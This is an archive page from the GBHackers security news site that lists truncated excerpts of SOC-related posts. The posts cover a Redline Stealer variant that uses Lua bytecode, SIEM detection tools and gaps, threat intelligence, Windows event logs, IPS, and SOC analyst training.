SOC Archives - GBHackers Security | #1 Globally Trusted Cyber Security News Platform

Redline Malware Using Lua Bytecode to Challenge the SOC/TI Team to Detect

Kaaviya — Tue, 30 Apr 2024 15:12:29 +0000

The first instance of Redline using such a method is in a new variant of Redline Stealer malware that McAfee has discovered uses Lua bytecode to obfuscate its malicious code. The malware was discovered on a legitimate Microsoft repository (vcpkg) disguised within a zip file named “Cheat.Lab.2.7.2.zip,” containing an MSI installer that deployed two executables […]

The post Redline Malware Using Lua Bytecode to Challenge the SOC/TI Team to Detect appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

AMIDES – Open-source Detection System to Uncover SIEM Blind Points

Tushar Subhra — Mon, 20 Nov 2023 11:35:56 +0000

Cyberattacks pose a significant risk, and prevention alone isn’t enough, so timely detection is crucial. That’s why most organizations use SIEM (Security Information and Event Management) systems to centrally collect and analyze security events with expert-written rules for detecting intrusions. Organizations use SIEM rulesets for intrusion detection, focusing on misuse patterns for known attacks. It’s […]

The post AMIDES – Open-source Detection System to Uncover SIEM Blind Points appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

IBM Unveils Cloud-Native QRadar SIEM to Maximize Power of SOC Professionals

Sneka — Sat, 11 Nov 2023 11:49:47 +0000

IBM has recently announced the launch of its Cloud-Native SIEM solution, which is designed to enhance the scale, speed, and flexibility of security teams. With this new offering, organizations can benefit from improved threat detection and response capabilities, empowering them to better protect their digital assets and stay ahead of potential cyber-attacks. IBM Security helps […]

The post IBM Unveils Cloud-Native QRadar SIEM to Maximize Power of SOC Professionals appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

SOC Fourth Defense Phase – Cyber Threat Intelligence Guide

Cyber Writes — Mon, 10 Jul 2023 10:00:24 +0000

Cyber Threat intelligence is one of the most critical concerns in the evolving threat environment of rapid day-zero attacks, cyber-criminality and espionage activities; the traditional approaches will be increasingly important to maintain but will simply not be sufficient to address risk in individual organizations adequately. Threat actors are constantly inventing new tools and techniques to […]

The post SOC Fourth Defense Phase – Cyber Threat Intelligence Guide appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Most Enterprise SIEMs Fail Against MITRE ATT&CK Tactics

Gurubaran — Wed, 28 Jun 2023 13:58:16 +0000

SIEM (Security Incident and Event Management) tools are being used in most organizations for monitoring, analyzing, and preventing threat actors. Organizations are trying to build more and more in terms of security to protect against ransomware attacks, data breaches, and many other types of cybercriminal activities. However, Security is a continuous process. These SIEM tools […]

The post Most Enterprise SIEMs Fail Against MITRE ATT&CK Tactics appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

SOC First Defense – Understanding The Cyber Attack Chain – A Defense with/without SOC

Bhuvanesh — Mon, 26 Jun 2023 10:51:52 +0000

This article will help you to understand the SOC modern cyber threats and the most commonly used attack surfaces behind any malware/cyber-attacks. Most times, cyber-attacks are getting executed in stages. So the SOC team must understand the attack patterns and the attack chain. So breaking the attack chain and averting the criminal’s intent to stop their […]

The post SOC First Defense – Understanding The Cyber Attack Chain – A Defense with/without SOC appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Diving Deeper Into Windows Event logs for Security Operation Center (SOC) – Guide

POOJA GAONKAR — Tue, 20 Jun 2023 05:54:00 +0000

Cyber Security operations center is protecting organizations and the sensitive business data of customers. It ensures active monitoring of valuable assets of the business with visibility, alerting and investigating threats, and a holistic approach to managing risk. Analytics service can be an in-house or managed security service. Collecting event logs and analyzing logs with real-world […]

The post Diving Deeper Into Windows Event logs for Security Operation Center (SOC) – Guide appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Modern CyberSOC – A Brief Implementation Of Building a Cyber Security Infrastructure

Balaji — Sat, 10 Jun 2023 06:30:00 +0000

In earlier years, everyone depends on CyberSOC (including firewalls, WAF, SIEM, etc.) and the priority in building the SOC provides security, and the CIA was maintained. However, later the emergence of the attacks and the threat actors becomes more challenging and the existing SOC will not be able to provide better security over the CIA. […]

The post Modern CyberSOC – A Brief Implementation Of Building a Cyber Security Infrastructure appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Intrusion Prevention System (IPS) In-depth Analysis – A Detailed Guide

Gurubaran — Wed, 07 Jun 2023 08:02:18 +0000

Like an Intrusion detection system (IDS), an Intrusion prevention system (IPS) screens network traffic. In this article, we deep dive into Intrusion Prevention System architecture. An Intrusion Prevention System (IPS) is a framework that screens a network for evil exercises, for example, security dangers or policy compliance. Vulnerability exploits normally come in the form of malicious […]

The post Intrusion Prevention System (IPS) In-depth Analysis – A Detailed Guide appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools – 2023

Priya James — Fri, 28 Apr 2023 15:16:08 +0000

SOC Training is one of the most critical concerns in building a Quality Security Operation Center Team to fight against advanced threats that target the organization’s network. Sophisticated detection and prevention technologies are mandatory implementations by security experts since cyber attacks are rising daily. SO implementing a dedicated SOC operation and SOC analyst team who […]

The post SOC Analyst Training – Cyber Attack Intrusion Analysis With SIEM Tools – 2023 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.